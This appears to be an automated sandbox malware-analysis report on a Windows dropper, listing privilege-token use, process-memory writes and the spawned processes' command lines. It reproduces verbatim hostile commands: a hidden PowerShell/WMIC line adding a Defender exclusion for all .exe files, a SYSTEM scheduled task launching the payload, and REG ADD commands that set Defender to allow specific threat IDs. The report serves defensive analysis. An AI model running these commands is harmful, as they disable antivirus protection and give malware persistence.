N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A
N/A | N/A | C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\nUhpWNH.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 2364 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4872 wrote to memory of 3960 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3960 wrote to memory of 1456 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 4824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4824 wrote to memory of 4996 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4872 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3492 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1960 wrote to memory of 2184 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2184 wrote to memory of 4392 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 860 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4528 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3508 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4456 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 4984 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 1960 wrote to memory of 3936 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

C:\Users\Admin\AppData\Local\Temp\7zS33F1.tmp\Install.exe

.\Install.exe /hDJuIdidFXt "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe\" 1V /mdsite_idLGV 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\DqUyAVK.exe 1V /mdsite_idLGV 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

